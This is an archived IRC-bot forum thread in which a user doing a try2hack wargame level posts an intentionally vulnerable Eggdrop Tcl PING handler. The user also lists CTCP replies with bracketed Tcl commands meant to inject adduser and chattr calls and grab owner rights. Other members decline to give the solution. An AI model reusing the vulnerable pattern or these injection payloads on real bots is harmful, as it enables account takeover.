This is the new home of the egghelp.org community forum.
All data has been migrated (including user logins/passwords) to a new phpBB version.

For more information, see this announcement post. Click the X in the top right-corner of this box to dismiss this message.

Question to CTCPREPLY Bot Exploit BUG

Old posts that have not been replied to for several years.
Locked
T
TraXX

Post by TraXX »

Hello Everybody,

i have a question about an exploit Bug Quest that i have to do:

I got this message:

Code: Select all

bind ctcr - PING ctcr:pingreply
proc ctcr:pingreply {nick uhost hand dest key arg} {
set dur [expr [unixtime] - $arg]
putserv "NOTICE $nick :Your ping reply took $dur seconds"}
Now i have to create my own account on the bot and gain +n (owner)
by exploiting an intentional bug in the bot.

Any effort to let the bot crash, die or act erroneously is forbidden.

I have tried the following commands in the channel, but just by the first one i got a message back.

/ctcpreply THEBOT PING [adduser TraXX *!TraXX@*]
/ctcpreply THEBOT PING [setuser TraXX HOSTS TraXX!TraXX@*.net]
/ctcpreply THEBOT PING [setuser TraXX PASS blabla]
/ctcpreply THEBOT PING [chattr TraXX +mn]
/dcc chat THEBOT

What i have done wrong?
The First Anwswer i get from the bot is when i have typed in the first CTCPREPLY Line 1 above.
I got this:

··· notice (u): -THEBOT- Your ping reply took 1021302734 seconds

By the other last 4 lines nohting happens.
What i must do?

How i can get me regged on the bot with +n and make a dcc chat?
Please help me, it is important!

THANKX IN ADVANCE!!!

<font size=-1>[ This Message was edited by: TraXX on 2002-05-13 12:58 ]</font>
Top
P
Petersen
Owner
Posts: 685
Joined: Thu Sep 27, 2001 8:00 pm
Location: Blackpool, UK

Post by Petersen »

heh, you really think anyone here is gonna help you exploit a scripting hole? even if you were doing it for good intentions, we still wouldn't answer because not everyone who reads this board is so honorable. the answer is actually quite simple in the end, though you'll probably have to look through the tcl source to find it.
Top
T
TraXX

Post by TraXX »

think what you want, i will not hack anyone or so. it is just a test ok? i believe you won't believe it is a test, but it is really one.

i missed a command in all the others, than i can finish said one man to me.

Top
W
Wcc
Master
Posts: 278
Joined: Sun Oct 28, 2001 8:00 pm
Location: USA
Contact:
Contact Wcc

Post by Wcc »

You're one of those try2hack level 9 people, aren't you? :smile:
Top
T
TraXX

Post by TraXX »

maybe... :wink:
Top
g
guppy
eggdrop engineer
Posts: 199
Joined: Mon Sep 24, 2001 8:00 pm
Location: Canada
Contact:
Contact guppy

Post by guppy »

I remember when I secured that level a bit more and then the owner of the bot got mad and shut the bot down :razz:~ Some people eh?

Top
F
FuSL

Post by FuSL »

hello,
here's another one of those try2hack lvl9ers ;)

Couldn't anybody give us a hint?
because I don't really understand that part :)

oh, aand btw: @thread opener...
it's finished after this, isn't it? because, where should you get a new quest, after getting n?

FuSL
Top
p
ppslim
Revered One
Posts: 3914
Joined: Sun Sep 23, 2001 8:00 pm
Location: Liverpool, England

Post by ppslim »

It's simply cheating if we give the answer.

Though, I will give you a hint.

There are hundreds of threads on this forum, where the effects of this exploit is shown.

You will need to understand what causes the errors involved, to understand the exploit.
Top
F
FuSL

Post by FuSL »

ppslim wrote:It's simply cheating if we give the answer.

Though, I will give you a hint.

There are hundreds of threads on this forum, where the effects of this exploit is shown.

You will need to understand what causes the errors involved, to understand the exploit.
er..well,
thanks :)
Top
Locked

Return to “Archive”